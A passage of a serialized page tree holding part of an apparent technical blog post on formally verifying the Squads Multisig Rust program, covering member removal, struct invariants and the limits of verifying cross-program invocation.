data",{"type":28,"tag":116,"props":26608,"children":26609},{"style":370},[26610],{"type":33,"value":4160},{"type":28,"tag":116,"props":26612,"children":26613},{"style":370},[26614],{"type":33,"value":24954},{"type":28,"tag":116,"props":26616,"children":26617},{"style":266},[26618],{"type":33,"value":3178},{"type":28,"tag":116,"props":26620,"children":26621},{"class":245,"line":779},[26622,26626,26630,26634],{"type":28,"tag":116,"props":26623,"children":26624},{"style":272},[26625],{"type":33,"value":25007},{"type":28,"tag":116,"props":26627,"children":26628},{"style":370},[26629],{"type":33,"value":4160},{"type":28,"tag":116,"props":26631,"children":26632},{"style":350},[26633],{"type":33,"value":2718},{"type":28,"tag":116,"props":26635,"children":26636},{"style":266},[26637],{"type":33,"value":3178},{"type":28,"tag":116,"props":26639,"children":26640},{"class":245,"line":796},[26641],{"type":28,"tag":116,"props":26642,"children":26643},{"style":266},[26644],{"type":33,"value":25028},{"type":28,"tag":116,"props":26646,"children":26647},{"class":245,"line":847},[26648],{"type":28,"tag":116,"props":26649,"children":26650},{"style":266},[26651],{"type":33,"value":25036},{"type":28,"tag":116,"props":26653,"children":26654},{"class":245,"line":898},[26655,26659,26663,26667,26671,26675],{"type":28,"tag":116,"props":26656,"children":26657},{"style":272},[26658],{"type":33,"value":25044},{"type":28,"tag":116,"props":26660,"children":26661},{"style":370},[26662],{"type":33,"value":4160},{"type":28,"tag":116,"props":26664,"children":26665},{"style":339},[26666],{"type":33,"value":25053},{"type":28,"tag":116,"props":26668,"children":26669},{"style":266},[26670],{"type":33,"value":9254},{"type":28,"tag":116,"props":26672,"children":26673},{"style":370},[26674],{"type":33,"value":9259},{"type":28,"tag":116,"props":26676,"children":26677},{"style":266},[26678],{"type":33,"value":25066},{"type":28,"tag":116,"props":26680,"children":26681},{"class":245,"line":907},[26682],{"type":28,"tag":116,"props":26683,"children":26684},{"style":266},[26685],{"type":33,"value":406},{"type":28,"tag":29,"props":26687,"children":26688},{},[26689],{"type":33,"value":26690},"Interestingly, the multisig has 0 keys and yet this instruction does not error. Let's take a closer look to figure out why:",{"type":28,"tag":29,"props":26692,"children":26693},{},[26694,26696,26702],{"type":33,"value":26695},"Inside our handler, we see that it only checks if the number of keys exactly equals 1. Otherwise it invokes ",{"type":28,"tag":98,"props":26697,"children":26699},{"className":26698},[],[26700],{"type":33,"value":26701},"Ms::remove_member",{"type":33,"value":4160},{"type":28,"tag":234,"props":26704,"children":26706},{"code":26705,"language":2651,"meta":7,"className":2652,"style":7},"if ctx.accounts.multisig.keys.len() == 1 {\n    return err!(MsError::CannotRemoveSoloMember);\n}\nctx.accounts.multisig.remove_member(old_member)?;\n",[26707],{"type":28,"tag":98,"props":26708,"children":26709},{"__ignoreMap":7},[26710,26769,26800,26807],{"type":28,"tag":116,"props":26711,"children":26712},{"class":245,"line":246},[26713,26717,26721,26725,26729,26733,26737,26741,26745,26749,26753,26757,26761,26765],{"type":28,"tag":116,"props":26714,"children":26715},{"style":260},[26716],{"type":33,"value":263},{"type":28,"tag":116,"props":26718,"children":26719},{"style":272},[26720],{"type":33,"value":25498},{"type":28,"tag":116,"props":26722,"children":26723},{"style":370},[26724],{"type":33,"value":141},{"type":28,"tag":116,"props":26726,"children":26727},{"style":266},[26728],{"type":33,"value":14341},{"type":28,"tag":116,"props":26730,"children":26731},{"style":370},[26732],{"type":33,"value":141},{"type":28,"tag":116,"props":26734,"children":26735},{"style":266},[26736],{"type":33,"value":23465},{"type":28,"tag":116,"props":26738,"children":26739},{"style":370},[26740],{"type":33,"value":141},{"type":28,"tag":116,"props":26742,"children":26743},{"style":266},[26744],{"type":33,"value":20646},{"type":28,"tag":116,"props":26746,"children":26747},{"style":370},[26748],{"type":33,"value":141},{"type":28,"tag":116,"props":26750,"children":26751},{"style":282},[26752],{"type":33,"value":8807},{"type":28,"tag":116,"props":26754,"children":26755},{"style":266},[26756],{"type":33,"value":13709},{"type":28,"tag":116,"props":26758,"children":26759},{"style":370},[26760],{"type":33,"value":2340},{"type":28,"tag":116,"props":26762,"children":26763},{"style":350},[26764],{"type":33,"value":4192},{"type":28,"tag":116,"props":26766,"children":26767},{"style":266},[26768],{"type":33,"value":1291},{"type":28,"tag":116,"props":26770,"children":26771},{"class":245,"line":256},[26772,26776,26780,26784,26788,26792,26796],{"type":28,"tag":116,"props":26773,"children":26774},{"style":260},[26775],{"type":33,"value":393},{"type":28,"tag":116,"props":26777,"children":26778},{"style":282},[26779],{"type":33,"value":23181},{"type":28,"tag":116,"props":26781,"children":26782},{"style":266},[26783],{"type":33,"value":313},{"type":28,"tag":116,"props":26785,"children":26786},{"style":339},[26787],{"type":33,"value":23190},{"type":28,"tag":116,"props":26789,"children":26790},{"style":370},[26791],{"type":33,"value":3151},{"type":28,"tag":116,"props":26793,"children":26794},{"style":339},[26795],{"type":33,"value":25574},{"type":28,"tag":116,"props":26797,"children":26798},{"style":266},[26799],{"type":33,"value":895},{"type":28,"tag":116,"props":26801,"children":26802},{"class":245,"line":293},[26803],{"type":28,"tag":116,"props":26804,"children":26805},{"style":266},[26806],{"type":33,"value":406},{"type":28,"tag":116,"props":26808,"children":26809},{"class":245,"line":361},[26810,26814,26818,26822,26826,26830,26834,26838,26842,26846,26850,26854],{"type":28,"tag":116,"props":26811,"children":26812},{"style":272},[26813],{"type":33,"value":19944},{"type":28,"tag":116,"props":26815,"children":26816},{"style":370},[26817],{"type":33,"value":141},{"type":28,"tag":116,"props":26819,"children":26820},{"style":266},[26821],{"type":33,"value":14341},{"type":28,"tag":116,"props":26823,"children":26824},{"style":370},[26825],{"type":33,"value":141},{"type":28,"tag":116,"props":26827,"children":26828},{"style":266},[26829],{"type":33,"value":23465},{"type":28,"tag":116,"props":26831,"children":26832},{"style":370},[26833],{"type":33,"value":141},{"type":28,"tag":116,"props":26835,"children":26836},{"style":282},[26837],{"type":33,"value":25121},{"type":28,"tag":116,"props":26839,"children":26840},{"style":266},[26841],{"type":33,"value":313},{"type":28,"tag":116,"props":26843,"children":26844},{"style":272},[26845],{"type":33,"value":25454},{"type":28,"tag":116,"props":26847,"children":26848},{"style":266},[26849],{"type":33,"value":1829},{"type":28,"tag":116,"props":26851,"children":26852},{"style":370},[26853],{"type":33,"value":2825},{"type":28,"tag":116,"props":26855,"children":26856},{"style":266},[26857],{"type":33,"value":384},{"type":28,"tag":29,"props":26859,"children":26860},{},[26861,26863,26869,26871,26877],{"type":33,"value":26862},"In that function, it checks if the member to remove is contained in that multisig (with ",{"type":28,"tag":98,"props":26864,"children":26866},{"className":26865},[],[26867],{"type":33,"value":26868},"Ms::is_member",{"type":33,"value":26870},") and if it is not, it simply skips the removal and returns ",{"type":28,"tag":98,"props":26872,"children":26874},{"className":26873},[],[26875],{"type":33,"value":26876},"Ok(())",{"type":33,"value":141},{"type":28,"tag":234,"props":26879,"children":26881},{"code":26880,"language":2651,"meta":7,"className":2652,"style":7},"pub fn remove_member(&mut self, member: Pubkey) -> Result\u003C()> {\n    if let Some(ind) = self.is_member(member) {\n        self.keys.remove(ind);\n        if self.keys.len() \u003C usize::from(self.threshold) {\n            self.threshold = self.keys.len().try_into().unwrap();\n        }\n    }\n    Ok(())\n}\n",[26882],{"type":28,"tag":98,"props":26883,"children":26884},{"__ignoreMap":7},[26885,26949,27008,27045,27104,27172,27179,27186,27197],{"type":28,"tag":116,"props":26886,"children":26887},{"class":245,"line":246},[26888,26892,26896,26900,26904,26908,26912,26916,26920,26925,26929,26933,26937,26941,26945],{"type":28,"tag":116,"props":26889,"children":26890},{"style":376},[26891],{"type":33,"value":13356},{"type":28,"tag":116,"props":26893,"children":26894},{"style":376},[26895],{"type":33,"value":13361},{"type":28,"tag":116,"props":26897,"children":26898},{"style":282},[26899],{"type":33,"value":25420},{"type":28,"tag":116,"props":26901,"children":26902},{"style":266},[26903],{"type":33,"value":313},{"type":28,"tag":116,"props":26905,"children":26906},{"style":370},[26907],{"type":33,"value":2780},{"type":28,"tag":116,"props":26909,"children":26910},{"style":376},[26911],{"type":33,"value":3394},{"type":28,"tag":116,"props":26913,"children":26914},{"style":376},[26915],{"type":33,"value":13463},{"type":28,"tag":116,"props":26917,"children":26918},{"style":266},[26919],{"type":33,"value":825},{"type":28,"tag":116,"props":26921,"children":26922},{"style":272},[26923],{"type":33,"value":26924},"member",{"type":28,"tag":116,"props":26926,"children":26927},{"style":370},[26928],{"type":33,"value":4160},{"type":28,"tag":116,"props":26930,"children":26931},{"style":339},[26932],{"type":33,"value":20520},{"type":28,"tag":116,"props":26934,"children":26935},{"style":266},[26936],{"type":33,"value":1609},{"type":28,"tag":116,"props":26938,"children":26939},{"style":370},[26940],{"type":33,"value":13423},{"type":28,"tag":116,"props":26942,"children":26943},{"style":339},[26944],{"type":33,"value":13428},{"type":28,"tag":116,"props":26946,"children":26947},{"style":266},[26948],{"type":33,"value":19995},{"type":28,"tag":116,"props":26950,"children":26951},{"class":245,"line":256},[26952,26956,26961,26966,26970,26975,26979,26983,26987,26991,26996,27000,27004],{"type":28,"tag":116,"props":26953,"children":26954},{"style":260},[26955],{"type":33,"value":11947},{"type":28,"tag":116,"props":26957,"children":26958},{"style":376},[26959],{"type":33,"value":26960}," let",{"type":28,"tag":116,"props":26962,"children":26963},{"style":339},[26964],{"type":33,"value":26965}," Some",{"type":28,"tag":116,"props":26967,"children":26968},{"style":266},[26969],{"type":33,"value":313},{"type":28,"tag":116,"props":26971,"children":26972},{"style":272},[26973],{"type":33,"value":26974},"ind",{"type":28,"tag":116,"props":26976,"children":26977},{"style":266},[26978],{"type":33,"value":1609},{"type":28,"tag":116,"props":26980,"children":26981},{"style":370},[26982],{"type":33,"value":373},{"type":28,"tag":116,"props":26984,"children":26985},{"style":376},[26986],{"type":33,"value":13463},{"type":28,"tag":116,"props":26988,"children":26989},{"style":370},[26990],{"type":33,"value":141},{"type":28,"tag":116,"props":26992,"children":26993},{"style":282},[26994],{"type":33,"value":26995},"is_member",{"type":28,"tag":116,"props":26997,"children":26998},{"style":266},[26999],{"type":33,"value":313},{"type":28,"tag":116,"props":27001,"children":27002},{"style":272},[27003],{"type":33,"value":26924},{"type":28,"tag":116,"props":27005,"children":27006},{"style":266},[27007],{"type":33,"value":844},{"type":28,"tag":116,"props":27009,"children":27010},{"class":245,"line":293},[27011,27016,27020,27024,27028,27033,27037,27041],{"type":28,"tag":116,"props":27012,"children":27013},{"style":376},[27014],{"type":33,"value":27015},"        self",{"type":28,"tag":116,"props":27017,"children":27018},{"style":370},[27019],{"type":33,"value":141},{"type":28,"tag":116,"props":27021,"children":27022},{"style":266},[27023],{"type":33,"value":20646},{"type":28,"tag":116,"props":27025,"children":27026},{"style":370},[27027],{"type":33,"value":141},{"type":28,"tag":116,"props":27029,"children":27030},{"style":282},[27031],{"type":33,"value":27032},"remove",{"type":28,"tag":116,"props":27034,"children":27035},{"style":266},[27036],{"type":33,"value":313},{"type":28,"tag":116,"props":27038,"children":27039},{"style":272},[27040],{"type":33,"value":26974},{"type":28,"tag":116,"props":27042,"children":27043},{"style":266},[27044],{"type":33,"value":895},{"type":28,"tag":116,"props":27046,"children":27047},{"class":245,"line":361},[27048,27052,27056,27060,27064,27068,27072,27076,27080,27084,27088,27092,27096,27100],{"type":28,"tag":116,"props":27049,"children":27050},{"style":260},[27051],{"type":33,"value":2943},{"type":28,"tag":116,"props":27053,"children":27054},{"style":376},[27055],{"type":33,"value":13463},{"type":28,"tag":116,"props":27057,"children":27058},{"style":370},[27059],{"type":33,"value":141},{"type":28,"tag":116,"props":27061,"children":27062},{"style":266},[27063],{"type":33,"value":20646},{"type":28,"tag":116,"props":27065,"children":27066},{"style":370},[27067],{"type":33,"value":141},{"type":28,"tag":116,"props":27069,"children":27070},{"style":282},[27071],{"type":33,"value":8807},{"type":28,"tag":116,"props":27073,"children":27074},{"style":266},[27075],{"type":33,"value":25699},{"type":28,"tag":116,"props":27077,"children":27078},{"style":339},[27079],{"type":33,"value":16263},{"type":28,"tag":116,"props":27081,"children":27082},{"style":370},[27083],{"type":33,"value":3151},{"type":28,"tag":116,"props":27085,"children":27086},{"style":282},[27087],{"type":33,"value":19137},{"type":28,"tag":116,"props":27089,"children":27090},{"style":266},[27091],{"type":33,"value":313},{"type":28,"tag":116,"props":27093,"children":27094},{"style":376},[27095],{"type":33,"value":13379},{"type":28,"tag":116,"props":27097,"children":27098},{"style":370},[27099],{"type":33,"value":141},{"type":28,"tag":116,"props":27101,"children":27102},{"style":266},[27103],{"type":33,"value":25744},{"type":28,"tag":116,"props":27105,"children":27106},{"class":245,"line":387},[27107,27112,27116,27120,27124,27128,27132,27136,27140,27144,27148,27152,27156,27160,27164,27168],{"type":28,"tag":116,"props":27108,"children":27109},{"style":376},[27110],{"type":33,"value":27111},"            self",{"type":28,"tag":116,"props":27113,"children":27114},{"style":370},[27115],{"type":33,"value":141},{"type":28,"tag":116,"props":27117,"children":27118},{"style":266},[27119],{"type":33,"value":20734},{"type":28,"tag":116,"props":27121,"children":27122},{"style":370},[27123],{"type":33,"value":373},{"type":28,"tag":116,"props":27125,"children":27126},{"style":376},[27127],{"type":33,"value":13463},{"type":28,"tag":116,"props":27129,"children":27130},{"style":370},[27131],{"type":33,"value":141},{"type":28,"tag":116,"props":27133,"children":27134},{"style":266},[27135],{"type":33,"value":20646},{"type":28,"tag":116,"props":27137,"children":27138},{"style":370},[27139],{"type":33,"value":141},{"type":28,"tag":116,"props":27141,"children":27142},{"style":282},[27143],{"type":33,"value":8807},{"type":28,"tag":116,"props":27145,"children":27146},{"style":266},[27147],{"type":33,"value":13545},{"type":28,"tag":116,"props":27149,"children":27150},{"style":370},[27151],{"type":33,"value":141},{"type":28,"tag":116,"props":27153,"children":27154},{"style":282},[27155],{"type":33,"value":25817},{"type":28,"tag":116,"props":27157,"children":27158},{"style":266},[27159],{"type":33,"value":13545},{"type":28,"tag":116,"props":27161,"children":27162},{"style":370},[27163],{"type":33,"value":141},{"type":28,"tag":116,"props":27165,"children":27166},{"style":282},[27167],{"type":33,"value":3336},{"type":28,"tag":116,"props":27169,"children":27170},{"style":266},[27171],{"type":33,"value":1445},{"type":28,"tag":116,"props":27173,"children":27174},{"class":245,"line":400},[27175],{"type":28,"tag":116,"props":27176,"children":27177},{"style":266},[27178],{"type":33,"value":1954},{"type":28,"tag":116,"props":27180,"children":27181},{"class":245,"line":614},[27182],{"type":28,"tag":116,"props":27183,"children":27184},{"style":266},[27185],{"type":33,"value":3025},{"type":28,"tag":116,"props":27187,"children":27188},{"class":245,"line":631},[27189,27193],{"type":28,"tag":116,"props":27190,"children":27191},{"style":339},[27192],{"type":33,"value":13999},{"type":28,"tag":116,"props":27194,"children":27195},{"style":266},[27196],{"type":33,"value":14004},{"type":28,"tag":116,"props":27198,"children":27199},{"class":245,"line":665},[27200],{"type":28,"tag":116,"props":27201,"children":27202},{"style":266},[27203],{"type":33,"value":406},{"type":28,"tag":29,"props":27205,"children":27206},{},[27207,27209,27214,27216,27222,27224,27230,27232,27237],{"type":33,"value":27208},"Inside ",{"type":28,"tag":98,"props":27210,"children":27212},{"className":27211},[],[27213],{"type":33,"value":26868},{"type":33,"value":27215},", we see that it performs a ",{"type":28,"tag":98,"props":27217,"children":27219},{"className":27218},[],[27220],{"type":33,"value":27221},"binary_search",{"type":33,"value":27223}," on the keys vec and returns the index or ",{"type":28,"tag":98,"props":27225,"children":27227},{"className":27226},[],[27228],{"type":33,"value":27229},"None",{"type":33,"value":27231},". Since the vec has size zero, this will just return ",{"type":28,"tag":98,"props":27233,"children":27235},{"className":27234},[],[27236],{"type":33,"value":27229},{"type":33,"value":141},{"type":28,"tag":234,"props":27239,"children":27241},{"code":27240,"language":2651,"meta":7,"className":2652,"style":7},"pub fn is_member(&self, member: Pubkey) -> Option\u003Cusize> {\n    match self.keys.binary_search(&member) {\n        Ok(ind) => Some(ind),\n        _ => None,\n    }\n}\n",[27242],{"type":28,"tag":98,"props":27243,"children":27244},{"__ignoreMap":7},[27245,27314,27357,27396,27417,27424],{"type":28,"tag":116,"props":27246,"children":27247},{"class":245,"line":246},[27248,27252,27256,27261,27265,27269,27273,27277,27281,27285,27289,27293,27297,27302,27306,27310],{"type":28,"tag":116,"props":27249,"children":27250},{"style":376},[27251],{"type":33,"value":13356},{"type":28,"tag":116,"props":27253,"children":27254},{"style":376},[27255],{"type":33,"value":13361},{"type":28,"tag":116,"props":27257,"children":27258},{"style":282},[27259],{"type":33,"value":27260}," is_member",{"type":28,"tag":116,"props":27262,"children":27263},{"style":266},[27264],{"type":33,"value":313},{"type":28,"tag":116,"props":27266,"children":27267},{"style":370},[27268],{"type":33,"value":2780},{"type":28,"tag":116,"props":27270,"children":27271},{"style":376},[27272],{"type":33,"value":13379},{"type":28,"tag":116,"props":27274,"children":27275},{"style":266},[27276],{"type":33,"value":825},{"type":28,"tag":116,"props":27278,"children":27279},{"style":272},[27280],{"type":33,"value":26924},{"type":28,"tag":116,"props":27282,"children":27283},{"style":370},[27284],{"type":33,"value":4160},{"type":28,"tag":116,"props":27286,"children":27287},{"style":339},[27288],{"type":33,"value":20520},{"type":28,"tag":116,"props":27290,"children":27291},{"style":266},[27292],{"type":33,"value":1609},{"type":28,"tag":116,"props":27294,"children":27295},{"style":370},[27296],{"type":33,"value":13423},{"type":28,"tag":116,"props":27298,"children":27299},{"style":339},[27300],{"type":33,"value":27301}," Option",{"type":28,"tag":116,"props":27303,"children":27304},{"style":266},[27305],{"type":33,"value":514},{"type":28,"tag":116,"props":27307,"children":27308},{"style":339},[27309],{"type":33,"value":16263},{"type":28,"tag":116,"props":27311,"children":27312},{"style":266},[27313],{"type":33,"value":6952},{"type":28,"tag":116,"props":27315,"children":27316},{"class":245,"line":256},[27317,27321,27325,27329,27333,27337,27341,27345,27349,27353],{"type":28,"tag":116,"props":27318,"children":27319},{"style":260},[27320],{"type":33,"value":14419},{"type":28,"tag":116,"props":27322,"children":27323},{"style":376},[27324],{"type":33,"value":13463},{"type":28,"tag":116,"props":27326,"children":27327},{"style":370},[27328],{"type":33,"value":141},{"type":28,"tag":116,"props":27330,"children":27331},{"style":266},[27332],{"type":33,"value":20646},{"type":28,"tag":116,"props":27334,"children":27335},{"style":370},[27336],{"type":33,"value":141},{"type":28,"tag":116,"props":27338,"children":27339},{"style":282},[27340],{"type":33,"value":27221},{"type":28,"tag":116,"props":27342,"children":27343},{"style":266},[27344],{"type":33,"value":313},{"type":28,"tag":116,"props":27346,"children":27347},{"style":370},[27348],{"type":33,"value":2780},{"type":28,"tag":116,"props":27350,"children":27351},{"style":272},[27352],{"type":33,"value":26924},{"type":28,"tag":116,"props":27354,"children":27355},{"style":266},[27356],{"type":33,"value":844},{"type":28,"tag":116,"props":27358,"children":27359},{"class":245,"line":293},[27360,27364,27368,27372,27376,27380,27384,27388,27392],{"type":28,"tag":116,"props":27361,"children":27362},{"style":339},[27363],{"type":33,"value":14477},{"type":28,"tag":116,"props":27365,"children":27366},{"style":266},[27367],{"type":33,"value":313},{"type":28,"tag":116,"props":27369,"children":27370},{"style":272},[27371],{"type":33,"value":26974},{"type":28,"tag":116,"props":27373,"children":27374},{"style":266},[27375],{"type":33,"value":1609},{"type":28,"tag":116,"props":27377,"children":27378},{"style":370},[27379],{"type":33,"value":1286},{"type":28,"tag":116,"props":27381,"children":27382},{"style":339},[27383],{"type":33,"value":26965},{"type":28,"tag":116,"props":27385,"children":27386},{"style":266},[27387],{"type":33,"value":313},{"type":28,"tag":116,"props":27389,"children":27390},{"style":272},[27391],{"type":33,"value":26974},{"type":28,"tag":116,"props":27393,"children":27394},{"style":266},[27395],{"type":33,"value":6408},{"type":28,"tag":116,"props":27397,"children":27398},{"class":245,"line":361},[27399,27404,27408,27413],{"type":28,"tag":116,"props":27400,"children":27401},{"style":272},[27402],{"type":33,"value":27403},"        _",{"type":28,"tag":116,"props":27405,"children":27406},{"style":370},[27407],{"type":33,"value":1418},{"type":28,"tag":116,"props":27409,"children":27410},{"style":339},[27411],{"type":33,"value":27412}," None",{"type":28,"tag":116,"props":27414,"children":27415},{"style":266},[27416],{"type":33,"value":3178},{"type":28,"tag":116,"props":27418,"children":27419},{"class":245,"line":387},[27420],{"type":28,"tag":116,"props":27421,"children":27422},{"style":266},[27423],{"type":33,"value":3025},{"type":28,"tag":116,"props":27425,"children":27426},{"class":245,"line":400},[27427],{"type":28,"tag":116,"props":27428,"children":27429},{"style":266},[27430],{"type":33,"value":406},{"type":28,"tag":29,"props":27432,"children":27433},{},[27434,27436,27441,27443,27448,27450,27455,27457,27462],{"type":33,"value":27435},"So interestingly, a ",{"type":28,"tag":98,"props":27437,"children":27439},{"className":27438},[],[27440],{"type":33,"value":20646},{"type":33,"value":27442}," vec of size 0 ",{"type":28,"tag":2583,"props":27444,"children":27445},{},[27446],{"type":33,"value":27447},"is actually",{"type":33,"value":27449}," a sufficient condition to execute ",{"type":28,"tag":98,"props":27451,"children":27453},{"className":27452},[],[27454],{"type":33,"value":25121},{"type":33,"value":27456},". However would it ever actually happen? Well we know from before that when we create the multisig, the threshold must be less than or equal to the number of keys and also greater than zero. So in any ",{"type":28,"tag":2583,"props":27458,"children":27459},{},[27460],{"type":33,"value":27461},"valid",{"type":33,"value":27463}," multisig, the number of keys should never be zero.",{"type":28,"tag":29,"props":27465,"children":27466},{},[27467,27469,27474],{"type":33,"value":27468},"We can represent this ",{"type":28,"tag":2583,"props":27470,"children":27471},{},[27472],{"type":33,"value":27473},"validity",{"type":33,"value":27475}," with a struct invariant. In fact the invariant we defined earlier will be sufficient:",{"type":28,"tag":234,"props":27477,"children":27479},{"code":27478,"language":2651,"meta":7,"className":2652,"style":7},"#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms { ... }\n",[27480],{"type":28,"tag":98,"props":27481,"children":27482},{"__ignoreMap":7},[27483,27490,27513,27564,27571],{"type":28,"tag":116,"props":27484,"children":27485},{"class":245,"line":246},[27486],{"type":28,"tag":116,"props":27487,"children":27488},{"style":266},[27489],{"type":33,"value":20441},{"type":28,"tag":116,"props":27491,"children":27492},{"class":245,"line":256},[27493,27497,27501,27505,27509],{"type":28,"tag":116,"props":27494,"children":27495},{"style":266},[27496],{"type":33,"value":24384},{"type":28,"tag":116,"props":27498,"children":27499},{"style":370},[27500],{"type":33,"value":141},{"type":28,"tag":116,"props":27502,"children":27503},{"style":266},[27504],{"type":33,"value":20734},{"type":28,"tag":116,"props":27506,"children":27507},{"style":370},[27508],{"type":33,"value":9611},{"type":28,"tag":116,"props":27510,"children":27511},{"style":266},[27512],{"type":33,"value":20743},{"type":28,"tag":116,"props":27514,"children":27515},{"class":245,"line":293},[27516,27520,27524,27528,27532,27536,27540,27544,27548,27552,27556,27560],{"type":28,"tag":116,"props":27517,"children":27518},{"style":370},[27519],{"type":33,"value":15283},{"type":28,"tag":116,"props":27521,"children":27522},{"style":266},[27523],{"type":33,"value":20667},{"type":28,"tag":116,"props":27525,"children":27526},{"style":370},[27527],{"type":33,"value":141},{"type":28,"tag":116,"props":27529,"children":27530},{"style":266},[27531],{"type":33,"value":20734},{"type":28,"tag":116,"props":27533,"children":27534},{"style":376},[27535],{"type":33,"value":8513},{"type":28,"tag":116,"props":27537,"children":27538},{"style":339},[27539],{"type":33,"value":13397},{"type":28,"tag":116,"props":27541,"children":27542},{"style":370},[27543],{"type":33,"value":7869},{"type":28,"tag":116,"props":27545,"children":27546},{"style":266},[27547],{"type":33,"value":13463},{"type":28,"tag":116,"props":27549,"children":27550},{"style":370},[27551],{"type":33,"value":141},{"type":28,"tag":116,"props":27553,"children":27554},{"style":266},[27555],{"type":33,"value":20646},{"type":28,"tag":116,"props":27557,"children":27558},{"style":370},[27559],{"type":33,"value":141},{"type":28,"tag":116,"props":27561,"children":27562},{"style":266},[27563],{"type":33,"value":20795},{"type":28,"tag":116,"props":27565,"children":27566},{"class":245,"line":361},[27567],{"type":28,"tag":116,"props":27568,"children":27569},{"style":266},[27570],{"type":33,"value":19922},{"type":28,"tag":116,"props":27572,"children":27573},{"class":245,"line":387},[27574,27578,27582,27586,27590,27594],{"type":28,"tag":116,"props":27575,"children":27576},{"style":376},[27577],{"type":33,"value":13356},{"type":28,"tag":116,"props":27579,"children":27580},{"style":376},[27581],{"type":33,"value":20814},{"type":28,"tag":116,"props":27583,"children":27584},{"style":339},[27585],{"type":33,"value":20819},{"type":28,"tag":116,"props":27587,"children":27588},{"style":266},[27589],{"type":33,"value":9254},{"type":28,"tag":116,"props":27591,"children":27592},{"style":370},[27593],{"type":33,"value":9259},{"type":28,"tag":116,"props":27595,"children":27596},{"style":266},[27597],{"type":33,"value":9264},{"type":28,"tag":29,"props":27599,"children":27600},{},[27601,27603,27609,27611,27617],{"type":33,"value":27602},"The use of a struct invariant allows us to define (and verify) the possible states that an account can be in at the start and end of an instruction. In this case, our struct invariant rules out the case where ",{"type":28,"tag":98,"props":27604,"children":27606},{"className":27605},[],[27607],{"type":33,"value":27608},"keys.len() == 0",{"type":33,"value":27610}," and allows us to prove the biconditional ",{"type":28,"tag":98,"props":27612,"children":27614},{"className":27613},[],[27615],{"type":33,"value":27616},"(keys.len() >= 1) -> (instruction succeeds)",{"type":33,"value":141},{"type":28,"tag":75,"props":27619,"children":27621},{"id":27620},"safety-guarantees",[27622],{"type":33,"value":22447},{"type":28,"tag":29,"props":27624,"children":27625},{},[27626],{"type":33,"value":27627},"Formal verification is an awesome technique but it is not perfect. There are situations where things are not possible to formally verify and you need to resort to other methods.",{"type":28,"tag":29,"props":27629,"children":27630},{},[27631],{"type":33,"value":27632},"In particular, one of the difficult-to-verify parts of the Squads Multisig program is cross-program-invocation. Specifically, since cross-program-invocation executes foreign code, it is difficult (if not impossible) to verify whether this will succeed or fail.",{"type":28,"tag":29,"props":27634,"children":27635},{},[27636,27638,27644],{"type":33,"value":27637},"In the multisig program this happens in the ",{"type":28,"tag":98,"props":27639,"children":27641},{"className":27640},[],[27642],{"type":33,"value":27643},"execute_transaction",{"type":33,"value":27645}," instruction.",{"type":28,"tag":29,"props":27647,"children":27648},{},[27649],{"type":28,"tag":2583,"props":27650,"children":27651},{},[27652],{"type":33,"value":27653},"So what do you do?",{"type":28,"tag":29,"props":27655,"children":27656},{},[27657],{"type":33,"value":27658},"For example, in a worst-case scenario you could imagine a situation like the following:",{"type":28,"tag":234,"props":27660,"children":27662},{"code":27661,"language":2651,"meta":7,"className":2652,"style":7},"#[derive(Accounts)]\npub MyCtx {\n    #[account(mut)]\n    pub my_account: Account\u003C'info, Acc>\n}\n\n#[account]\n#[invariant(bad == false)]\nstruct Acc {\n    pub bad: bool\n}\n\nimpl Acc {\n    pub fn put_into_bad_state() {\n        self.bad = true;\n    }\n}\n\n// Instruction handler:\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n    Ok(())\n}\n",[27663],{"type":28,"tag":98,"props":27664,"children":27665},{"__ignoreMap":7},[27666,27681,27697,27712,27753,27760,27767,27774,27791,27807,27828,27835,27842,27858,27878,27906,27913,27920,27927,27935,27988,28014,28021,28050,28074,28109,28116,28127],{"type":28,"tag":116,"props":27667,"children":27668},{"class":245,"line":246},[27669,27673,27677],{"type":28,"tag":116,"props":27670,"children":27671},{"style":266},[27672],{"type":33,"value":22500},{"type":28,"tag":116,"props":27674,"children":27675},{"style":339},[27676],{"type":33,"value":22505},{"type":28,"tag":116,"props":27678,"children":27679},{"style":266},[27680],{"type":33,"value":19922},{"type":28,"tag":116,"props":27682,"children":27683},{"class":245,"line":256},[27684,27688,27693],{"type":28,"tag":116,"props":27685,"children":27686},{"style":376},[27687],{"type":33,"value":13356},{"type":28,"tag":116,"props":27689,"children":27690},{"style":339},[27691],{"type":33,"value":27692}," MyCtx",{"type":28,"tag":116,"props":27694,"children":27695},{"style":266},[27696],{"type":33,"value":1291},{"type":28,"tag":116,"props":27698,"children":27699},{"class":245,"line":293},[27700,27704,27708],{"type":28,"tag":116,"props":27701,"children":27702},{"style":266},[27703],{"type":33,"value":22792},{"type":28,"tag":116,"props":27705,"children":27706},{"style":376},[27707],{"type":33,"value":3394},{"type":28,"tag":116,"props":27709,"children":27710},{"style":266},[27711],{"type":33,"value":19922},{"type":28,"tag":116,"props":27713,"children":27714},{"class":245,"line":361},[27715,27719,27724,27728,27732,27736,27740,27744,27749],{"type":28,"tag":116,"props":27716,"children":27717},{"style":376},[27718],{"type":33,"value":20506},{"type":28,"tag":116,"props":27720,"children":27721},{"style":272},[27722],{"type":33,"value":27723}," my_account",{"type":28,"tag":116,"props":27725,"children":27726},{"style":370},[27727],{"type":33,"value":4160},{"type":28,"tag":116,"props":27729,"children":27730},{"style":339},[27731],{"type":33,"value":22757},{"type":28,"tag":116,"props":27733,"children":27734},{"style":266},[27735],{"type":33,"value":22585},{"type":28,"tag":116,"props":27737,"children":27738},{"style":339},[27739],{"type":33,"value":22590},{"type":28,"tag":116,"props":27741,"children":27742},{"style":266},[27743],{"type":33,"value":825},{"type":28,"tag":116,"props":27745,"children":27746},{"style":339},[27747],{"type":33,"value":27748},"Acc",{"type":28,"tag":116,"props":27750,"children":27751},{"style":266},[27752],{"type":33,"value":506},{"type":28,"tag":116,"props":27754,"children":27755},{"class":245,"line":387},[27756],{"type":28,"tag":116,"props":27757,"children":27758},{"style":266},[27759],{"type":33,"value":406},{"type":28,"tag":116,"props":27761,"children":27762},{"class":245,"line":400},[27763],{"type":28,"tag":116,"props":27764,"children":27765},{"emptyLinePlaceholder":19},[27766],{"type":33,"value":1044},{"type":28,"tag":116,"props":27768,"children":27769},{"class":245,